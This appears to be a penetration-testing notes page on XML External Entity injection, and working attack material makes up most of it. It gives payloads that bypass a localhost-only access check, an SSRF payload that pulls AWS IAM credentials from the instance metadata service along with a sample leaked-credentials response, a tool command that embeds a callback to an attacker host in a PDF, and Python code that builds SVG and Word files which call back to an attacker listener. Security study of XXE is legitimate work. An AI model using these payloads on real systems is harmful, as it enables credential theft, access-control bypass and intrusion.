XML External Entity (XXE) Injection
https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/
Bypassing Access Controls with XXE
Default protection: viewlog.php is meant to be reachable only from the local machine, so it rejects any request that carries proxy headers or does not come from a loopback address:
<?php
// Reject requests that arrived through a proxy (Client-IP / X-Forwarded-For set)
// or that did not originate from a loopback address.
if (isset($_SERVER['HTTP_CLIENT_IP'])
    || isset($_SERVER['HTTP_X_FORWARDED_FOR'])
    || !in_array(@$_SERVER['REMOTE_ADDR'], array(
        '127.0.0.1',
        '::1',
    ))
) {
    header('HTTP/1.0 403 Forbidden');
    exit(
        'You are not allowed to access this file.'
    );
}
PHP bypass: the XML parser runs on the web server, so when it expands the entity it is the server that requests viewlog.php. That request carries no proxy headers and, with the application and viewlog.php on the same host, comes from the loopback address, so the check passes. The php://filter wrapper base64-encodes the fetched page so that its HTML cannot break the XML the entity is expanded into; base64-decode the contents of <result> to read the page.
<?xml version="1.0"?>
<!DOCTYPE results [
<!ENTITY harmless SYSTEM
"php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php"
>
]>
<results>
<result>&harmless;</result>
</results>
External Error XXE
SSRF
Simple HTTP Connection
The parser fetches whatever URL the entity names, from the server's own network position. Here the entity points at the AWS instance metadata service, and the fetched document is expanded into productId:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
Because the application echoes the rejected product ID in its error message, the metadata response (the temporary credentials of the instance's admin role) comes back in-band:
HTTP/1.1 400 Bad Request
Content-Type: application/json
Connection: close
Content-Length: 546
"Invalid product ID: {
"Code" : "Success",
"LastUpdated" : "2019-12-12T18:17:44.456491Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "rNYgGiw5Wwv34YPVSzpN",
"SecretAccessKey" : "m4RaetLQwyQwocJ60xjFJrwYnAJj03K8css1A9Fw",
"Token" : "UCj4myxOKROLlb5wPp5Nahw2fHZsG5n1EkOGokbEtj7uCXa8bwoexc2wiX73Picn2AFwHa44f3Snpz02SuEmZtrTgma9Mr2J3Z48tXICOLyP3HgG5Sf7Q2ArYFZQNZoolTXwsX1jN2u2zTOtpoU0V34kcw0axRCXi9JusZ7z9QDrAWRroWeicvkRrKy7dkocW4MsQWxzINiiF39s4F5vRH7GQaKBahwprLJkd4NwH6PDY2IzlSLYpUxQzuJvS4tA",
"Expiration" : "2025-12-10T18:17:44.456491Z"
}"
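The two techniques above share one mechanism: the XML parser, not the attacker, makes the HTTP request, so it arrives from the server's own address with none of the attacker's headers. The following is an added example, not code from the page or the Acunetix article: a Python stand-in for the PHP localhost-only guard, run on a loopback listener with an ephemeral port in place of example.com/viewlog.php, and an xml.sax parser that expands the page's "harmless" entity against it. The page body is constructed sample text; the parser flag is the real xml.sax feature that controls external general entity loading.

```python
# Added example (not from the page): localhost-only guard bypassed by letting
# the server's own XML parser fetch the page. Assumptions: a loopback HTTP
# listener stands in for example.com/viewlog.php; SECRET_PAGE is constructed.
import io
import threading
import xml.sax
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for the protected page's content.
SECRET_PAGE = b"viewlog: admin password rotated by root"


class ViewLogHandler(BaseHTTPRequestHandler):
    """Mirrors the PHP guard: 403 if proxy headers are present or the
    request does not come from a loopback address."""

    def do_GET(self):
        proxied = "Client-IP" in self.headers or "X-Forwarded-For" in self.headers
        if proxied or self.client_address[0] not in ("127.0.0.1", "::1"):
            self.send_response(403)
            self.end_headers()
            self.wfile.write(b"You are not allowed to access this file.")
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(SECRET_PAGE)

    def log_message(self, *args):  # keep per-request logging quiet
        pass


def start_viewlog_server():
    """Bind the guarded page on 127.0.0.1 and return (server, url)."""
    server = HTTPServer(("127.0.0.1", 0), ViewLogHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d/viewlog.php" % server.server_address[1]


def direct_request_status(url):
    """An outside client reaching the page through a proxy: denied with 403."""
    try:
        with urlopen(Request(url, headers={"X-Forwarded-For": "203.0.113.5"})) as resp:
            return resp.status
    except HTTPError as err:
        return err.code


def xxe_payload(url):
    """The page's 'harmless' entity, pointed at the guarded URL."""
    doc = (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE results [\n'
        '  <!ENTITY harmless SYSTEM "%s">\n'
        ']>\n'
        '<results><result>&harmless;</result></results>\n'
    )
    return (doc % url).encode()


class TextCollector(ContentHandler):
    """Collects character data, which is where an expanded entity ends up."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_untrusted_xml(xml_bytes, resolve_external_entities):
    """Vulnerable when resolve_external_entities=True: the parser fetches
    SYSTEM entities itself. False is the hardened setting (and the xml.sax
    default since Python 3.7.1)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def demo():
    """Returns (direct request status, vulnerable parse result, hardened parse result)."""
    server, url = start_viewlog_server()
    try:
        denied = direct_request_status(url)
        leaked = parse_untrusted_xml(xxe_payload(url), resolve_external_entities=True)
        blocked = parse_untrusted_xml(xxe_payload(url), resolve_external_entities=False)
    finally:
        server.shutdown()
        server.server_close()
    return denied, leaked, blocked


if __name__ == "__main__":
    print(demo())
```

The direct request is refused, the parser's request is served, and the page text surfaces inside the parsed document. The body here is plain text; had the listener returned HTML, its markup would have to be well-formed inside the entity, which is why the PHP payload above wraps the resource in php://filter base64 encoding.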
Generate Payloads
https://github.com/StefanMichielse/generate_xxe_payloads
Supported carrier formats:
SVG
PDF
Word Docs
Make a PDF
192.168.14.1:8000 is the attacker-controlled host:port the document calls back to; have a listener running there before delivering the file.
ruby oxml_xxe.rb --poc pdf -i 192.168.14.1:8000
|+| Inserting into ./samples/form.pdf. Currently this only tests for PUBLIC DTD
|+| Wrote to ./output/o_1636152138.pdf
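To see where the generator puts the payload inside a carrier file, the following added example (not the tool's own code) hand-builds two of the formats it lists, an SVG and a minimal .docx, with the DOCTYPE-declared external entity referenced from a text node. The callback URL is a placeholder, the three-part OOXML package is the minimum Word accepts, and the listener at the callback address is assumed rather than provided.

```python
# Added example (not the linked generator): SVG and .docx carriers with an
# external general entity declared in the internal DTD subset and referenced
# from a text node. Callback URL and listener are placeholders/assumptions.
import io
import zipfile

ENTITY_NAME = "xxe"

# Minimal OOXML package parts; document.xml is the one that carries the text.
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">\n'
    '  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>\n'
    '  <Default Extension="xml" ContentType="application/xml"/>\n'
    '  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>\n'
    '</Types>\n'
)
RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">\n'
    '  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>\n'
    '</Relationships>\n'
)


def doctype(root_element, entity_url):
    """Internal DTD subset declaring one external general entity."""
    if '"' in entity_url:
        raise ValueError("a double quote cannot appear inside the system literal")
    return '<!DOCTYPE %s [\n  <!ENTITY %s SYSTEM "%s">\n]>\n' % (root_element, ENTITY_NAME, entity_url)


def svg_payload(entity_url):
    """SVG whose <text> node holds the entity reference; a renderer that
    resolves external entities fetches the URL when it draws the text."""
    body = (
        '<svg xmlns="http://www.w3.org/2000/svg" width="400" height="40">\n'
        '  <text x="0" y="20">&%s;</text>\n'
        '</svg>\n' % ENTITY_NAME
    )
    return '<?xml version="1.0" encoding="UTF-8"?>\n' + doctype("svg", entity_url) + body


def docx_payload(entity_url):
    """Minimal .docx: the DOCTYPE goes into word/document.xml, the part any
    parser (Word, or a server-side converter) reads for the document text."""
    body = (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">\n'
        '  <w:body><w:p><w:r><w:t>&%s;</w:t></w:r></w:p></w:body>\n'
        '</w:document>\n' % ENTITY_NAME
    )
    document_xml = '<?xml version="1.0" encoding="UTF-8"?>\n' + doctype("w:document", entity_url) + body
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml", CONTENT_TYPES)
        pkg.writestr("_rels/.rels", RELS)
        pkg.writestr("word/document.xml", document_xml)
    return buf.getvalue()


def docx_parts(docx_bytes):
    """Unpack a .docx so the injected part can be inspected."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        return {name: pkg.read(name).decode("utf-8") for name in pkg.namelist()}


if __name__ == "__main__":
    callback = "http://192.168.14.1:8000/"  # placeholder listener address
    with open("xxe.svg", "w") as f:
        f.write(svg_payload(callback + "svg"))
    with open("xxe.docx", "wb") as f:
        f.write(docx_payload(callback + "docx"))
```

Using a different path per carrier (svg, docx) on the listener tells you which file was opened and parsed; a hit with no further data means the parser resolved the entity but did not reflect its content, which is the case where an out-of-band or error-based technique is needed rather than in-band reflection.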